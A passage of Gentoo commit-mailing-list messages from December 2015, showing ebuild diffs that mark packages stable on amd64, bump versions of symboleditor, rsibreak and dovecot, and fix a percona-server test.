Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:10:47 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:10:47 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=e7314e0e

dev-ruby/ruby-openid: amd64 stable wrt bug #568118

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 dev-ruby/ruby-openid/ruby-openid-2.7.0.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dev-ruby/ruby-openid/ruby-openid-2.7.0.ebuild 
b/dev-ruby/ruby-openid/ruby-openid-2.7.0.ebuild
index 34fc058..f676228 100644
--- a/dev-ruby/ruby-openid/ruby-openid-2.7.0.ebuild
+++ b/dev-ruby/ruby-openid/ruby-openid-2.7.0.ebuild
@@ -16,7 +16,7 @@ 
SRC_URI="https://github.com/openid/${PN}/archive/v${PV}.tar.gz -> ${P}.tar.gz"
 
 LICENSE="GPL-2"
 SLOT="0"
-KEYWORDS="~amd64 ~ppc ~x86 ~x86-macos"
+KEYWORDS="amd64 ~ppc ~x86 ~x86-macos"
 IUSE="test"
 
 all_ruby_prepare() {



[gentoo-commits] repo/gentoo:master commit in: app-i18n/im-freewnn/

2015-12-14 Thread Agostino Sarubbo
commit: ffbbdc3ce5950be2fc9bdb948ad59c85c426ec33
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:11:52 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:11:52 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=ffbbdc3c

app-i18n/im-freewnn: amd64 stable wrt bug #566230

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 app-i18n/im-freewnn/im-freewnn-0.0.2-r2.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/app-i18n/im-freewnn/im-freewnn-0.0.2-r2.ebuild 
b/app-i18n/im-freewnn/im-freewnn-0.0.2-r2.ebuild
index 253d3c2..d092a02 100644
--- a/app-i18n/im-freewnn/im-freewnn-0.0.2-r2.ebuild
+++ b/app-i18n/im-freewnn/im-freewnn-0.0.2-r2.ebuild
@@ -11,7 +11,7 @@ 
SRC_URI="http://bonobo.gnome.gr.jp/~nakai/immodule/${P}.tar.gz;
 
 LICENSE="GPL-2"
 SLOT="0"
-KEYWORDS="~amd64 ~ppc ~ppc64 ~x86"
+KEYWORDS="amd64 ~ppc ~ppc64 ~x86"
 IUSE=""
 
 RDEPEND="



[gentoo-commits] repo/gentoo:master commit in: net-analyzer/rrdtool/

2015-12-14 Thread Agostino Sarubbo
commit: 643af5309f43756759ffd270c70f40b52f3f39c6
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:10:30 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:10:30 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=643af530

net-analyzer/rrdtool: amd64 stable wrt bug #567586

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 net-analyzer/rrdtool/rrdtool-1.5.5.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net-analyzer/rrdtool/rrdtool-1.5.5.ebuild 
b/net-analyzer/rrdtool/rrdtool-1.5.5.ebuild
index 8ccb190..cde758c 100644
--- a/net-analyzer/rrdtool/rrdtool-1.5.5.ebuild
+++ b/net-analyzer/rrdtool/rrdtool-1.5.5.ebuild
@@ -16,7 +16,7 @@ SRC_URI="http://oss.oetiker.ch/rrdtool/pub/${P/_/-}.tar.gz;
 
 LICENSE="GPL-2"
 SLOT="0"
-KEYWORDS="~amd64 ~arm ~hppa ~mips ~ppc ~ppc64 ~s390 ~sh ~x86 ~x86-fbsd 
~amd64-linux ~ia64-linux ~x86-linux ~x86-macos ~x86-solaris"
+KEYWORDS="amd64 ~arm ~hppa ~mips ~ppc ~ppc64 ~s390 ~sh ~x86 ~x86-fbsd 
~amd64-linux ~ia64-linux ~x86-linux ~x86-macos ~x86-solaris"
 IUSE="dbi doc graph lua perl python rados rrdcgi ruby static-libs tcl tcpd"
 REQUIRED_USE="python? ( ${PYTHON_REQUIRED_USE} )"
 



[gentoo-commits] repo/gentoo:master commit in: dev-ruby/pkg-config/

2015-12-14 Thread Agostino Sarubbo
commit: 40d639611d84c4ca161150e79c8cf5a1c1a5f0ad
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:12:11 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:12:11 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=40d63961

dev-ruby/pkg-config: amd64 stable wrt bug #568042

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 dev-ruby/pkg-config/pkg-config-1.1.6.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dev-ruby/pkg-config/pkg-config-1.1.6.ebuild 
b/dev-ruby/pkg-config/pkg-config-1.1.6.ebuild
index 68aab95..a9b097a 100644
--- a/dev-ruby/pkg-config/pkg-config-1.1.6.ebuild
+++ b/dev-ruby/pkg-config/pkg-config-1.1.6.ebuild
@@ -15,7 +15,7 @@ DESCRIPTION="A pkg-config implementation by Ruby"
 HOMEPAGE="https://github.com/rcairo/pkg-config;
 LICENSE="|| ( LGPL-2 LGPL-2.1 LGPL-3 )"
 
-KEYWORDS="~amd64 ~ppc ~ppc64 ~x86"
+KEYWORDS="amd64 ~ppc ~ppc64 ~x86"
 SLOT="0"
 IUSE="test"
 



[gentoo-commits] repo/gentoo:master commit in: dev-ruby/ruby-ldap/

2015-12-14 Thread Agostino Sarubbo
commit: 20c392de988f887d0f7699699be3457fc0416f8f
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:11:39 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:11:39 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=20c392de

dev-ruby/ruby-ldap: amd64 stable wrt bug #568110

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 dev-ruby/ruby-ldap/ruby-ldap-0.9.17.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dev-ruby/ruby-ldap/ruby-ldap-0.9.17.ebuild 
b/dev-ruby/ruby-ldap/ruby-ldap-0.9.17.ebuild
index 10486fc..4eb3476 100644
--- a/dev-ruby/ruby-ldap/ruby-ldap-0.9.17.ebuild
+++ b/dev-ruby/ruby-ldap/ruby-ldap-0.9.17.ebuild
@@ -15,7 +15,7 @@ DESCRIPTION="A Ruby interface to some LDAP libraries"
 HOMEPAGE="http://ruby-ldap.sourceforge.net/;
 LICENSE="BSD"
 SLOT="0"
-KEYWORDS="~alpha ~amd64 ~hppa ~ia64 ~ppc ~ppc64 ~sparc ~x86 ~x86-macos"
+KEYWORDS="~alpha amd64 ~hppa ~ia64 ~ppc ~ppc64 ~sparc ~x86 ~x86-macos"
 IUSE="ssl"
 DEPEND=">=net-nds/openldap-2
dev-libs/cyrus-sasl



[gentoo-commits] repo/gentoo:master commit in: dev-ruby/ruby-opengl/

2015-12-14 Thread Agostino Sarubbo
commit: 0d88fa007732905009512e9e045d3c788ddb72bd
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:11:26 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:11:26 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=0d88fa00

dev-ruby/ruby-opengl: amd64 stable wrt bug #568114

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 dev-ruby/ruby-opengl/ruby-opengl-0.9.2.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dev-ruby/ruby-opengl/ruby-opengl-0.9.2.ebuild 
b/dev-ruby/ruby-opengl/ruby-opengl-0.9.2.ebuild
index 6a8772f..a64e25d 100644
--- a/dev-ruby/ruby-opengl/ruby-opengl-0.9.2.ebuild
+++ b/dev-ruby/ruby-opengl/ruby-opengl-0.9.2.ebuild
@@ -23,7 +23,7 @@ HOMEPAGE="https://github.com/larskanis/opengl;
 
 LICENSE="MIT"
 SLOT="0"
-KEYWORDS="~amd64 ~hppa ~ppc ~ppc64 ~x86"
+KEYWORDS="amd64 ~hppa ~ppc ~ppc64 ~x86"
 
 IUSE=""
 



[gentoo-commits] repo/gentoo:master commit in: dev-db/percona-server/

2015-12-14 Thread Brian Evans
commit: 78134bea3cbc01e18c89dc168e262bee49e62ca9
Author: Brian Evans  gentoo  org>
AuthorDate: Mon Dec 14 14:31:49 2015 +
Commit: Brian Evans  gentoo  org>
CommitDate: Mon Dec 14 14:35:26 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=78134bea

dev-db/percona-server: Fix tests due to removed USE flag

Package-Manager: portage-2.2.26

 dev-db/percona-server/percona-server-5.6.27.75.0-r1.ebuild | 7 ---
 1 file changed, 7 deletions(-)

diff --git a/dev-db/percona-server/percona-server-5.6.27.75.0-r1.ebuild 
b/dev-db/percona-server/percona-server-5.6.27.75.0-r1.ebuild
index 893ad8d..5d32935 100644
--- a/dev-db/percona-server/percona-server-5.6.27.75.0-r1.ebuild
+++ b/dev-db/percona-server/percona-server-5.6.27.75.0-r1.ebuild
@@ -96,13 +96,6 @@ multilib_src_test() {
# create directories because mysqladmin might right out of order
mkdir -p "${T}"/var-tests{,/log}
 
-   # Create a symlink to provided binaries so the tests can find 
them when client-libs is off
-   if ! use client-libs ; then
-   ln -srf /usr/bin/my_print_defaults 
"${BUILD_DIR}/client/my_print_defaults" || die
-   ln -srf /usr/bin/perror "${BUILD_DIR}/client/perror" || 
die
-   mysql-multilib_disable_test main.perror "String 
mismatch due to not building local perror"
-   fi
-
# These are failing in Percona 5.6 for now and are believed to 
be
# false positives:
#



[gentoo-commits] repo/gentoo:master commit in: media-gfx/symboleditor/

2015-12-14 Thread Michael Palimaka
commit: c874a5cc220417a64731733d539c58931c01e4cc
Author: Michael Palimaka  gentoo  org>
AuthorDate: Mon Dec 14 13:24:33 2015 +
Commit: Michael Palimaka  gentoo  org>
CommitDate: Mon Dec 14 13:25:20 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=c874a5cc

media-gfx/symboleditor: shorten DESCRIPTION to fit within 80-character guideline

Package-Manager: portage-2.2.26

 media-gfx/symboleditor/symboleditor-1.5.0.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/media-gfx/symboleditor/symboleditor-1.5.0.ebuild 
b/media-gfx/symboleditor/symboleditor-1.5.0.ebuild
index 8285e6b..b4e801e 100644
--- a/media-gfx/symboleditor/symboleditor-1.5.0.ebuild
+++ b/media-gfx/symboleditor/symboleditor-1.5.0.ebuild
@@ -10,7 +10,7 @@ KDE_LINGUAS="ca cs da de en_GB es et lt nl pl pt pt_BR sk sv 
uk"
 MY_P="SymbolEditor-${PV}"
 inherit kde4-base
 
-DESCRIPTION="Program to create libraries of QPainterPath objects with hints on 
how to render them"
+DESCRIPTION="Application to create libraries of QPainterPath objects with 
redering hints"
 HOMEPAGE="https://userbase.kde.org/SymbolEditor;
 SRC_URI="mirror://kde/stable/${PN}/${PV}/src/${MY_P}-1.tar.bz2"
 



[gentoo-commits] proj/kde:master commit in: media-gfx/symboleditor/

2015-12-14 Thread Michael Palimaka
commit: bbb13aab46a759ed93ca2cca25d89eb0adbd1973
Author: Michael Palimaka  gentoo  org>
AuthorDate: Mon Dec 14 13:25:30 2015 +
Commit: Michael Palimaka  gentoo  org>
CommitDate: Mon Dec 14 13:25:30 2015 +
URL:https://gitweb.gentoo.org/proj/kde.git/commit/?id=bbb13aab

media-gfx/symboleditor: moved to main tree

Package-Manager: portage-2.2.26

 media-gfx/symboleditor/symboleditor-2.0.0.ebuild | 49 
 1 file changed, 49 deletions(-)

diff --git a/media-gfx/symboleditor/symboleditor-2.0.0.ebuild 
b/media-gfx/symboleditor/symboleditor-2.0.0.ebuild
deleted file mode 100644
index bb0f595..000
--- a/media-gfx/symboleditor/symboleditor-2.0.0.ebuild
+++ /dev/null
@@ -1,49 +0,0 @@
-# Copyright 1999-2015 Gentoo Foundation
-# Distributed under the terms of the GNU General Public License v2
-# $Id$
-
-EAPI=5
-
-KDE_DOXYGEN="true"
-KDE_HANDBOOK="true"
-inherit kde5
-
-DESCRIPTION="Application to create libraries of QPainterPath objects with 
redering hints"
-HOMEPAGE="https://userbase.kde.org/SymbolEditor;
-if [[ ${KDE_BUILD_TYPE} != live ]]; then
-   MY_P=SymbolEditor-${PV}
-   SRC_URI="mirror://kde/stable/${PN}/${PV}/src/${MY_P}.tar.bz2"
-   S="${WORKDIR}"/${MY_P}
-fi
-
-LICENSE="GPL-2"
-KEYWORDS="~amd64"
-IUSE=""
-
-COMMON_DEPEND="
-   $(add_frameworks_dep kconfig)
-   $(add_frameworks_dep kconfigwidgets)
-   $(add_frameworks_dep kcoreaddons)
-   $(add_frameworks_dep ki18n)
-   $(add_frameworks_dep kio)
-   $(add_frameworks_dep kwidgetsaddons)
-   $(add_frameworks_dep kxmlgui)
-   dev-qt/qtgui:5
-   dev-qt/qtwidgets:5
-"
-DEPEND="${COMMON_DEPEND}
-   sys-devel/gettext
-   x11-misc/shared-mime-info
-"
-RDEPEND="${COMMON_DEPEND}
-   !media-gfx/symboleditor:4
-"
-
-src_configure() {
-   local mycmakeargs=(
-   $(cmake-utils_use_find_package doc Doxygen)
-   $(cmake-utils_use_find_package handbook KF5DocTools)
-   )
-
-   kde5_src_configure
-}



[gentoo-commits] repo/gentoo:master commit in: media-gfx/symboleditor/

2015-12-14 Thread Michael Palimaka
commit: fe0082e97d93ce506b12687fdff711d0cce91421
Author: Andreas Sturmlechner  gmail  com>
AuthorDate: Mon Dec 14 13:23:13 2015 +
Commit: Michael Palimaka  gentoo  org>
CommitDate: Mon Dec 14 13:25:20 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=fe0082e9

media-gfx/symboleditor: version bump

Package-Manager: portage-2.2.26

 media-gfx/symboleditor/Manifest  |  1 +
 media-gfx/symboleditor/symboleditor-2.0.0.ebuild | 49 
 2 files changed, 50 insertions(+)

diff --git a/media-gfx/symboleditor/Manifest b/media-gfx/symboleditor/Manifest
index e7a7681..20eb2a1 100644
--- a/media-gfx/symboleditor/Manifest
+++ b/media-gfx/symboleditor/Manifest
@@ -1 +1,2 @@
 DIST SymbolEditor-1.5.0-1.tar.bz2 779158 SHA256 
707da2874dcd08101b218b7a60f1ec3ed5ba056d6221a1dd472821737c545db0 SHA512 
5fe18b649ed78e6ab3c61ce80a0b159941a65065801cdc6a44f1187aa40a2816cbc7888ea9e120cad8089e3e8e7831cedfd3242de5092cea58eb5cf898de022c
 WHIRLPOOL 
b3219bd30fbf993b7bd1c998e068e9f462ce312d0e6038b7706324b15810a9a1933ddedf39e6c33ac92deb2d38802807c1c3094fd1733321248b4362a22749e5
+DIST SymbolEditor-2.0.0.tar.bz2 544789 SHA256 
7cf3ea3acae9bcbe1291526e8e3819d0707a2f288d33cfe22913ec7f894d6e14 SHA512 
8baee88fd8ff5f2b6334e80fe7c3fe8044ae521e5a8ffa2588f37dc4a8bf0495c902789bfaaed21a6eaf3c4f6380d18550aaed8046e84b396317104c8a49c993
 WHIRLPOOL 
ac6ec72c1d27ff55774378a384cebe2c5477af8093508e619036309993ec810bc918f68c9cb9a892498ea5afc51e1e9a8ab77ee3388f8d59755b464813cd

diff --git a/media-gfx/symboleditor/symboleditor-2.0.0.ebuild 
b/media-gfx/symboleditor/symboleditor-2.0.0.ebuild
new file mode 100644
index 000..bb0f595
--- /dev/null
+++ b/media-gfx/symboleditor/symboleditor-2.0.0.ebuild
@@ -0,0 +1,49 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+
+KDE_DOXYGEN="true"
+KDE_HANDBOOK="true"
+inherit kde5
+
+DESCRIPTION="Application to create libraries of QPainterPath objects with 
redering hints"
+HOMEPAGE="https://userbase.kde.org/SymbolEditor;
+if [[ ${KDE_BUILD_TYPE} != live ]]; then
+   MY_P=SymbolEditor-${PV}
+   SRC_URI="mirror://kde/stable/${PN}/${PV}/src/${MY_P}.tar.bz2"
+   S="${WORKDIR}"/${MY_P}
+fi
+
+LICENSE="GPL-2"
+KEYWORDS="~amd64"
+IUSE=""
+
+COMMON_DEPEND="
+   $(add_frameworks_dep kconfig)
+   $(add_frameworks_dep kconfigwidgets)
+   $(add_frameworks_dep kcoreaddons)
+   $(add_frameworks_dep ki18n)
+   $(add_frameworks_dep kio)
+   $(add_frameworks_dep kwidgetsaddons)
+   $(add_frameworks_dep kxmlgui)
+   dev-qt/qtgui:5
+   dev-qt/qtwidgets:5
+"
+DEPEND="${COMMON_DEPEND}
+   sys-devel/gettext
+   x11-misc/shared-mime-info
+"
+RDEPEND="${COMMON_DEPEND}
+   !media-gfx/symboleditor:4
+"
+
+src_configure() {
+   local mycmakeargs=(
+   $(cmake-utils_use_find_package doc Doxygen)
+   $(cmake-utils_use_find_package handbook KF5DocTools)
+   )
+
+   kde5_src_configure
+}



[gentoo-commits] repo/gentoo:master commit in: kde-misc/rsibreak/

2015-12-14 Thread Michael Palimaka
commit: 15f3b9b08457722927c1b993b5deceed3b7e4dc2
Author: Andreas Sturmlechner  gmail  com>
AuthorDate: Mon Dec 14 13:48:13 2015 +
Commit: Michael Palimaka  gentoo  org>
CommitDate: Mon Dec 14 13:49:18 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=15f3b9b0

kde-misc/rsibreak: version bump

Package-Manager: portage-2.2.26

 kde-misc/rsibreak/Manifest |  1 +
 kde-misc/rsibreak/rsibreak-0.12.ebuild | 44 ++
 2 files changed, 45 insertions(+)

diff --git a/kde-misc/rsibreak/Manifest b/kde-misc/rsibreak/Manifest
index 5174262..61152cc 100644
--- a/kde-misc/rsibreak/Manifest
+++ b/kde-misc/rsibreak/Manifest
@@ -1 +1,2 @@
 DIST rsibreak-0.11.tar.bz2 463748 SHA256 
bc224812c4554209a9cbba830078cee727ed1a5a3c8cb2109cbac78af2382efb SHA512 
50e15f45b93c79e4b7785a25dc41c60e40d52a0a777fbb01b57acacfb3c623b6d84cb11c75482c3ab75621644130e508618aaf354b2c526d6a4feda1aa80f2ff
 WHIRLPOOL 
6a8ec8a047e31fdbec73712c2d4e457d447523246c0cecc313468a666ade52a81feb6515adcef93e6e30410df55e30b41a57b85c5b4eedd4bd122815ed1b3af1
+DIST rsibreak-0.12.tar.xz 388204 SHA256 
5c6b579e4287dced4b56d81fcb28f6f12130522fdd4358d36ed5ac24f0848ce1 SHA512 
ae8da9acf4f501f590165916182a00f43deab79a4003df56d1fcd08cedf7387ff178f0bf88dbe57fa10ae67da0bc94e4239827d0acc36097e1546ae1771fbd84
 WHIRLPOOL 
6e2e637d49b0ac7dac6ee7fde46c1e3f0136c0e1d7c1d70ed35b238ab29193c6e7ff2043e4b72108eb09837fbf89832a2c11eee079a47be5da0a16c367e93d2b

diff --git a/kde-misc/rsibreak/rsibreak-0.12.ebuild 
b/kde-misc/rsibreak/rsibreak-0.12.ebuild
new file mode 100644
index 000..1d1aec9
--- /dev/null
+++ b/kde-misc/rsibreak/rsibreak-0.12.ebuild
@@ -0,0 +1,44 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+
+KDE_HANDBOOK="forceoptional"
+inherit kde5
+
+DESCRIPTION="Small utility which bothers you at certain intervals"
+HOMEPAGE="https://userbase.kde.org/RSIBreak;
+if [[ ${KDE_BUILD_TYPE} != live ]]; then
+   SRC_URI="mirror://kde/stable/${PN}/${PV}/${P}.tar.xz"
+fi
+
+LICENSE="GPL-2+ handbook? ( FDL-1.2 )"
+KEYWORDS="~amd64 ~x86"
+IUSE=""
+
+COMMON_DEPEND="
+   $(add_frameworks_dep kconfig)
+   $(add_frameworks_dep kconfigwidgets)
+   $(add_frameworks_dep kcoreaddons)
+   $(add_frameworks_dep kdbusaddons)
+   $(add_frameworks_dep ki18n)
+   $(add_frameworks_dep kiconthemes)
+   $(add_frameworks_dep kidletime)
+   $(add_frameworks_dep knotifications)
+   $(add_frameworks_dep knotifyconfig)
+   $(add_frameworks_dep ktextwidgets)
+   $(add_frameworks_dep kwidgetsaddons)
+   $(add_frameworks_dep kwindowsystem)
+   $(add_frameworks_dep kxmlgui)
+   dev-qt/qtdbus:5
+   dev-qt/qtgui:5
+   dev-qt/qtwidgets:5
+   dev-qt/qtx11extras:5
+"
+DEPEND="${COMMON_DEPEND}
+   sys-devel/gettext
+"
+RDEPEND="${COMMON_DEPEND}
+   !kde-misc/rsibreak:4
+"



[gentoo-commits] proj/kde:master commit in: kde-misc/rsibreak/

2015-12-14 Thread Michael Palimaka
commit: 6fa4ec6db061c2146cf82f19201d2d6de2f05ec4
Author: Michael Palimaka  gentoo  org>
AuthorDate: Mon Dec 14 13:49:48 2015 +
Commit: Michael Palimaka  gentoo  org>
CommitDate: Mon Dec 14 13:49:48 2015 +
URL:https://gitweb.gentoo.org/proj/kde.git/commit/?id=6fa4ec6d

kde-misc/rsibreak: improve LICENSE

Package-Manager: portage-2.2.26

 kde-misc/rsibreak/rsibreak-.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/kde-misc/rsibreak/rsibreak-.ebuild 
b/kde-misc/rsibreak/rsibreak-.ebuild
index 8cb400b..55daca6 100644
--- a/kde-misc/rsibreak/rsibreak-.ebuild
+++ b/kde-misc/rsibreak/rsibreak-.ebuild
@@ -13,7 +13,7 @@ if [[ ${KDE_BUILD_TYPE} != live ]]; then
SRC_URI="mirror://kde/stable/${PN}/${PV}/${P}.tar.xz"
 fi
 
-LICENSE="GPL-2+ FDL-1.2"
+LICENSE="GPL-2+ handbook? ( FDL-1.2 )"
 KEYWORDS=""
 IUSE=""
 



[gentoo-commits] proj/kde:master commit in: kde-misc/rsibreak/

2015-12-14 Thread Michael Palimaka
commit: 6315700d1732aeb773a2c9df6036bcc8b02e5dfe
Author: Michael Palimaka  gentoo  org>
AuthorDate: Mon Dec 14 13:49:29 2015 +
Commit: Michael Palimaka  gentoo  org>
CommitDate: Mon Dec 14 13:49:29 2015 +
URL:https://gitweb.gentoo.org/proj/kde.git/commit/?id=6315700d

kde-misc/rsibreak: moved to main tree

Package-Manager: portage-2.2.26

 kde-misc/rsibreak/rsibreak-0.12.ebuild | 44 --
 1 file changed, 44 deletions(-)

diff --git a/kde-misc/rsibreak/rsibreak-0.12.ebuild 
b/kde-misc/rsibreak/rsibreak-0.12.ebuild
deleted file mode 100644
index efc69d1..000
--- a/kde-misc/rsibreak/rsibreak-0.12.ebuild
+++ /dev/null
@@ -1,44 +0,0 @@
-# Copyright 1999-2015 Gentoo Foundation
-# Distributed under the terms of the GNU General Public License v2
-# $Id$
-
-EAPI=5
-
-KDE_HANDBOOK=forceoptional
-inherit kde5
-
-DESCRIPTION="Small utility which bothers you at certain intervals"
-HOMEPAGE="https://userbase.kde.org/RSIBreak;
-if [[ ${KDE_BUILD_TYPE} != live ]]; then
-   SRC_URI="mirror://kde/stable/${PN}/${PV}/${P}.tar.xz"
-fi
-
-LICENSE="GPL-2+ FDL-1.2"
-KEYWORDS="~amd64 ~x86"
-IUSE=""
-
-COMMON_DEPEND="
-   $(add_frameworks_dep kconfig)
-   $(add_frameworks_dep kconfigwidgets)
-   $(add_frameworks_dep kcoreaddons)
-   $(add_frameworks_dep kdbusaddons)
-   $(add_frameworks_dep ki18n)
-   $(add_frameworks_dep kiconthemes)
-   $(add_frameworks_dep kidletime)
-   $(add_frameworks_dep knotifications)
-   $(add_frameworks_dep knotifyconfig)
-   $(add_frameworks_dep ktextwidgets)
-   $(add_frameworks_dep kwidgetsaddons)
-   $(add_frameworks_dep kwindowsystem)
-   $(add_frameworks_dep kxmlgui)
-   dev-qt/qtdbus:5
-   dev-qt/qtgui:5
-   dev-qt/qtwidgets:5
-   dev-qt/qtx11extras:5
-"
-DEPEND="${COMMON_DEPEND}
-   sys-devel/gettext
-"
-RDEPEND="${COMMON_DEPEND}
-   !kde-misc/rsibreak:4
-"



[gentoo-commits] repo/gentoo:master commit in: net-mail/dovecot/

2015-12-14 Thread Eray Aslan
commit: b746033fcda74122346a533f22501df8bc4ef1cd
Author: Eray Aslan  gentoo  org>
AuthorDate: Mon Dec 14 15:02:15 2015 +
Commit: Eray Aslan  gentoo  org>
CommitDate: Mon Dec 14 15:02:15 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=b746033f

net-mail/dovecot: version bump to 2.2.21 (#568158)

Package-Manager: portage-2.2.26

 net-mail/dovecot/Manifest  |   2 +
 net-mail/dovecot/dovecot-2.2.21.ebuild | 308 +
 2 files changed, 310 insertions(+)

diff --git a/net-mail/dovecot/Manifest b/net-mail/dovecot/Manifest
index b2b6f52..139a597 100644
--- a/net-mail/dovecot/Manifest
+++ b/net-mail/dovecot/Manifest
@@ -1,2 +1,4 @@
+DIST dovecot-2.2-pigeonhole-0.4.10.tar.gz 1605634 SHA256 
e9dfe7160fd3b465d6d5068f219122626ef790cce507e290cd09852c7d90726f SHA512 
3e864727fc2bd346a7212135a3dd8759f9a5c27abd938c4d6b805c784c5c2c5aa401dd49cfa90951348a00202b85f91d86a2fa17ccab9a983a6faf2d0add48e8
 WHIRLPOOL 
d97cb3111a8de17bcaf3c2cba63063bd45cee7578f826a14441d4568154bcd3520f4d43354411247c8a4ed168c01181718689cb94cb6ae9a15cfb705d7c9c2fd
 DIST dovecot-2.2-pigeonhole-0.4.9.tar.gz 1577127 SHA256 
82892f876d26008a076973dfddf1cffaf5a0451825fd44e06287e94b89078649 SHA512 
9e7a18b43d59ed955b142d16696ca221822a547ea59ac70c1bb374eedb28b6ed99ea49f34ead1f9a16ded4573605e410a5cc8e038e1bdf5f943a65588b5d3af2
 WHIRLPOOL 
be309436b43af82a7cb8eff205e1638b2c59751927fdab187e6fde72330e4abd99878cbfa94ca50440ec8de1f9b569bf334d426891ddc73d5f647ee2040c193f
 DIST dovecot-2.2.19.tar.gz 5256627 SHA256 
759e1e3f9d907cdaabad1f5fbacc793ca191d234c084bec3bba42966952a4e9f SHA512 
1b9d605a6a5862ade9d1ca634a9e0171b7c212ab025fc2059051c3795470685b66516fa9fbe5ad91d84388268ea15795f2dcd70ffdf81736ce4d80fd284835e9
 WHIRLPOOL 
30dbe70bfeef10dbe414ebf3f091041ad66926a8748cd401ecaf9ed5c7602939e86943d98bfb839f32c0aa1d0081ab71adacf23bb4adba34e828ee296e9a7278
+DIST dovecot-2.2.21.tar.gz 4985686 SHA256 
7ab7139e59e1f0353bf9c24251f13c893cf1a6ef4bcc47e2d44de437108d0b20 SHA512 
0d246d44e0c908ea40d324982fb279b19424ddcb642e51796078f600fc5bf530898d2fa387fcfd971d43758cff22590e5ea6918c31e9f4a63f13a8c525a23d9b
 WHIRLPOOL 
242026e876a12b9ecd50a76849cb16161f625791bc9d1a54270f38f24e66bc31b6ddf90acf119af2bd4c94e392c875a0c29be08b84a5f25d080a7e1b13d52175

diff --git a/net-mail/dovecot/dovecot-2.2.21.ebuild 
b/net-mail/dovecot/dovecot-2.2.21.ebuild
new file mode 100644
index 000..baa628b
--- /dev/null
+++ b/net-mail/dovecot/dovecot-2.2.21.ebuild
@@ -0,0 +1,308 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+inherit eutils multilib ssl-cert systemd user versionator
+
+MY_P="${P/_/.}"
+major_minor="$(get_version_component_range 1-2)"
+sieve_version="0.4.10"
+if [[ ${PV} == *_rc* ]] ; then
+   rc_dir="rc/"
+else
+   rc_dir=""
+fi
+SRC_URI="http://dovecot.org/releases/${major_minor}/${rc_dir}${MY_P}.tar.gz
+   sieve? (
+   
http://pigeonhole.dovecot.org/releases/${major_minor}/${PN}-${major_minor}-pigeonhole-${sieve_version}.tar.gz
+   )
+   managesieve? (
+   
http://pigeonhole.dovecot.org/releases/${major_minor}/${PN}-${major_minor}-pigeonhole-${sieve_version}.tar.gz
+   ) "
+DESCRIPTION="An IMAP and POP3 server written with security primarily in mind"
+HOMEPAGE="http://www.dovecot.org/;
+
+SLOT="0"
+LICENSE="LGPL-2.1 MIT"
+KEYWORDS="~amd64 ~arm ~hppa ~ppc ~ppc64 ~s390 ~x86"
+
+IUSE_DOVECOT_AUTH="kerberos ldap mysql pam postgres sqlite vpopmail"
+IUSE_DOVECOT_STORAGE="cydir imapc +maildir mbox mdbox pop3c sdbox"
+IUSE_DOVECOT_COMPRESS="bzip2 lzma lz4 zlib"
+IUSE_DOVECOT_OTHER="caps doc ipv6 libressl lucene managesieve selinux sieve 
solr +ssl static-libs suid tcpd textcat"
+
+IUSE="${IUSE_DOVECOT_AUTH} ${IUSE_DOVECOT_STORAGE} ${IUSE_DOVECOT_COMPRESS} 
${IUSE_DOVECOT_OTHER}"
+
+DEPEND="bzip2? ( app-arch/bzip2 )
